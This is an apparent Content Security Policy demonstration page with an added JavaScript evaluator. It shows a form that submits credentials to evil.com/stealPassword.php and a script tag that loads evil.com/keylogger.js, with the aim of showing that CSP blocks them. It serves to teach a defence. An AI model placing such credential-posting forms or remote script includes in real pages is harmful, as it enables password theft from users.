CSP Demo

Who trusts this form?

<form action="https://evil.com/stealPassword.php">
<input type="text" name="firstname" value="Username">
<input type="text" name="lastname" value="Password">
<input type="submit" value="Submit">
</form>

Let's load a bad script!

<script src="https://evil.com/keylogger.js"></script>
Mixed content gets fixed too!

<img src="http://scotthelme.co.uk/assets/images/profile-150.png">
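
As an added example (not code from the original demo page), this sketch evaluates the three resources above against a Content-Security-Policy, including the case where `default-src` alone leaves the form unprotected because `form-action` has no fallback. The policy strings, the `demo.example` origin and all function names are assumptions, since the page does not show the header it is served with; source matching is simplified to `'self'`, `'none'`, scheme sources and exact origins.

```javascript
// Added example: minimal CSP evaluation for the three resources on this page.
const SELF = "https://demo.example"; // constructed origin for the page hosting the demo

function parsePolicy(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // A repeated directive is ignored by browsers; the first occurrence wins.
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Fetch directives fall back to default-src; form-action does not.
const FALLS_BACK = new Set(["script-src", "img-src"]);

function allows(policy, directive, url, self = SELF) {
  let sources = policy.get(directive);
  if (sources === undefined && FALLS_BACK.has(directive)) sources = policy.get("default-src");
  if (sources === undefined) return true; // no governing directive: not restricted
  const target = new URL(url);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === new URL(self).origin;
    if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return target.protocol === src.toLowerCase();
    try { return new URL(src).origin === target.origin; } catch { return false; }
  });
}

// upgrade-insecure-requests rewrites http: URLs to https: before the fetch.
function upgrade(policy, url) {
  const u = new URL(url);
  if (policy.has("upgrade-insecure-requests") && u.protocol === "http:") u.protocol = "https:";
  return u.href;
}

// Evaluate the form target, the script and the image shown on this page.
function evaluatePage(policy) {
  return {
    form: allows(policy, "form-action", "https://evil.com/stealPassword.php"),
    script: allows(policy, "script-src", "https://evil.com/keylogger.js"),
    image: upgrade(policy, "http://scotthelme.co.uk/assets/images/profile-150.png"),
  };
}

const strictPolicy = "script-src 'self'; form-action 'self'; upgrade-insecure-requests";
const weakPolicy = "default-src 'self'"; // blocks the script, but not the form post
console.log(evaluatePage(parsePolicy(strictPolicy)));
console.log(evaluatePage(parsePolicy(weakPolicy)));
```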